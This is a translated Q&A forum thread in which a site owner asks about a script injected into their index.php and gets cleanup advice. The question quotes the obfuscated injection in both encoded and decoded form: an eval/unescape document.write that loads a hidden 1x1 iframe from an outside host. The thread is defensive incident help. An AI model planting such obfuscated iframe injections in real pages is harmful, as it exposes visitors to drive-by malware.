0

我网站的 index.php 文件受到下面给出的脚本的影响。因此,谷歌已禁止我访问。有人请告诉我这是一种攻击,是否有任何解决方案。

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%6F%64%66%65%72%2E%63%6F%6D%2F%3F%35%30%36%36%37%31%38%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->

FWIW,上面的未编码版本是

eval(document.write('<iframe src="http://podfer.com/?5066718" width=1 height=1></iframe>'));

谢谢并恭祝安康

提斯蒙

4

3 回答 3

1

听起来像这样: 链接文本

根据您发布的有限信息,我几乎可以保证您在该站点上运行某种开源软件——也许不在受影响的确切站点上,但服务器上可能有一些......也不太可能修补到当前标准。我已经看到它发生在 phpBB、Joomla(尤其是 Joomla)、phpMyAdmin 和 Wordpress 上。这几乎是可怕的普遍现象,而且 99% 的时间远没有许多人想象的那么复杂。它发生在我的一个非常古老的 Mambo 测试安装中,并且在使用 phpBB 的流氓安装时,IT 人员中的某个人偷偷地在服务器上与他们的梦幻足球联盟通信。

问题是,黑客很懒惰。除非你有他们真正想要的东西,否则他们没有理由去单独攻击你……这不值得他们花时间。但是,如果您使用可利用的代码库运行一段普通代码,他们可以随机扫描站点以查找它,当他们找到漏洞时,自动攻击。因此,代码的内容和位置几乎总是相同的原因。

停放该站点...建立一个“正在建设中”页面。将您的代码拉下来并擦洗它,无论是手动还是自动。现在停止!更新所有开源代码,无论它是多么新近。现在对权限、SQL 查询(尤其是未转义的搜索框)和用户权限系统进行完整性检查。运行脚本注入测试。最后,一旦你尽你所能,测试,测试,测试。最后,认为它可能与问题无关,更改您的密码并使用良好的密码策略来保护它。

祝你好运。当心!

于 2010-09-29T04:29:53.960 回答
0

什么 bpeterson76 说的,而且:

如果您确实没有在系统上运行任何通用软件,我会首先检查您自己的脚本,特别是如果您在任何地方对文件系统进行任何写入。但它也可能是过时的服务器软件,如 apache 或者你有什么暴露了安全漏洞。由于数据已添加到您的文件中,因此不太可能是 SQL 注入。

根据您的托管,更新您的所有服务器软件,或询问您的托管服务提供商。

你有日志吗?仔细观察它们可能会发现这个洞。如果您在共享主机上,在某些设置上,如果您的文件权限允许,其他客户可以写入您的文件。

于 2010-09-29T04:51:37.950 回答
0

不久前,我的网站实际上遭到了类似的攻击。首先,检查您的 web 根目录下的文件夹中是否有以函数命名的 php 文件。我的是 opendir、iswritable 等。你应该在这些文件中看到更多的 base64 编码脚本。如果你不这样做,它可能是无关的。无论如何,podfer.com 的 who.is 记录都有一些信息。联系那个网站的托管公司,告诉他们它正在发起 CSS 攻击,他们应该毫不费力地关闭他。我得到了那个对我产生影响的黑客。

另外,如果你使用 Mosso/rackspace,你应该进入并收紧你的文件权限。

于 2010-09-29T05:12:31.123 回答